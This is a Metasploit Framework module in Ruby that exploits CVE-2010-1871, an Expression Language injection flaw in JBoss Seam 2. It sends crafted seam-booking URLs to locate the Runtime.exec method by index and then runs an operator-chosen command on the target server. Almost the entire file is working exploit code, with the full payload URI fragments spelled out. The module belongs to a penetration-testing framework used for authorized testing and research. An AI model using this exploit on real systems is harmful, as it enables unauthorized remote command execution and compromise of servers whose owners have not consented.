##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'            => 'JBoss Seam 2 Remote Command Execution',
			'Description'     => %q{
					JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
				4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
				Language (EL) expressions, which allows remote attackers to execute arbitrary code
				via a crafted URL.

				NOTE: this is only a vulnerability when the Java Security Manager is not properly
				configured.
			},
			'Author'          => [ 'guerrino di massa' ],
			'License'         => MSF_LICENSE,
			'References'      =>
				[
					[ 'CVE', '2010-1871' ],
					[ 'OSVDB', '66881']
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 19 2010'))

		register_options(
			[
				Opt::RPORT(8080),
				OptString.new('JBOSS_ROOT',[ true, 'JBoss root directory', '/']),
				OptString.new('CMD', [ true, "The command to execute."])
			], self.class)
	end

	def run
		jbr = datastore['JBOSS_ROOT']
		cmd_enc = ""
		cmd_enc << Rex::Text.uri_encode(datastore["CMD"])

		flag_found_one = 0
		flag_found_two = 0

		uri_part_1 = "seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
		uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
		uri_part_3 = "].invoke(null),'"

		print_status("Finding getDeclaredMethods() indexes... (0 to 24)")

		25.times do |index|
			req = jbr + uri_part_1 + index.to_s + "]}"

			res = send_request_cgi(
				{
					'uri'    => req,
					'method' => 'GET',
				}, 20)

			if (res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29))
				flag_found_one = index
				print_status("Found right index at [" + index.to_s + "]")
			elsif (res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime))
				print_status("Found right index at [" + index.to_s + "]")
				flag_found_two = index
			else
				print_status("Index [" + index.to_s + "]")
			end
		end

		if (flag_found_one > 0 && flag_found_two > 0 )
			print_status("Target appears VULNERABLE!")
			print_status("Sending remote command:" + datastore["CMD"])

			req = jbr + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"

			res = send_request_cgi(
				{
					'uri'    => req,
					'method' => 'GET',
				}, 20)

			if (res.headers['Location'] =~ %r(pwned=java.lang.UNIXProcess))
				print_status("Exploited successfully")
			else
				print_status("Exploit failed.")
			end
		else
			print_error("Target appears not vulnerable!")
		end
	end
end